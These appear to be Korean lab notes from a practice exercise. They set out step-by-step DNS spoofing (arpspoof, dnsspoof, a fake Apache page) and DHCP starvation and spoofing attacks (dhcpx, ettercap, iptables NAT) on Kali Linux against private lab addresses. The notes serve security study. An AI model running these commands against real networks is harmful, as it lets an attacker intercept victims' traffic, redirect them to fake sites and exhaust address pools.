DNS/DHCP Attack
DNS Attack
칼리
아파치
service apache2 start
아파치 설정파일
vim /etc/apache2/apache2.conf
startbootstrap-agency-gh-pages 디렉터리를 /var/www/html로 받고
var/www/html에 있던 기존 index.html파일은 지우고 tartbootstrap-agency-gh-pages 안에 있던 파일들을 /var/www/html로 꺼내놓는다.
그리고 모든 파일을 775로 변경한다
chmod 755 -R ./*
service apache2 restart 해준다.
원래는 똑같은 홈페이지를 준비해야 하지만 지금은 연습이므로
index.html파일 열어서 해킹 성공했는지 쉽게 알아볼 수 있게 내용을 변경해준다.
dnsspoof이 실행되는지 확인 후
vim /usr/share/dsniff/dnsspoof.hosts 안에
10.10.10.40 www.test.com 을 추가한다.
arpspoof -t 10.10.10.10 10.10.10.200 실행
fragrouter -B1 중단 (억지로 성공하기 위해서..)
- /usr/share/dsniff/dnsspoof.hosts파일에 있는 목록과 일치하는 요청이 있으면 응답을 보내라
dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts 실행
칼리
dhcpx 로 다운받기
DHCP Attack
- DHCP Starvation Tool
> 맥주소를 변경하여 계속 할당요청하여 dhcp ip를 고갈시키는 공격
- 윈도우에서 아무것도 할당 받지 않았던 상태에서 해야함
dhcpx -i eth0 -vvv -D 10.10.10.30
윈도우 ipconfig 설정 지우기
ipconfig /release
dhcp 할당 로그 확인
tail -f /var/lib/dhcpd/dhcpd.leases
DHCP Spoofing
단방향 공격
- 공격자 GW로 변경되어 할당받음
ettercap -T -M dhcp:10.10.10.240-249/255.255.255.0/10.10.10.30(dns설정)
양방향 공격
- 응답까지 캡쳐할 수 있게 함
- 네트워크 추가하기 eth1
- 추가한 네트워크 eth1 에 192.168.0.254/24로 네트워크 설정 후 재부팅
-Sysctl 활성화 하기
sysctl net.ipv4.ip_forward=1
-natpat로 라우팅하기
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
ettercap -i eth1 -T -M dhcp:192.168.0.10-19/255.255.255.0/8.8.8.8
> ettercap 실행 후 윈도우에서 ip할당 받고 ettercap 실행 종료 후 윈도우에서 ping 보내지는지 확인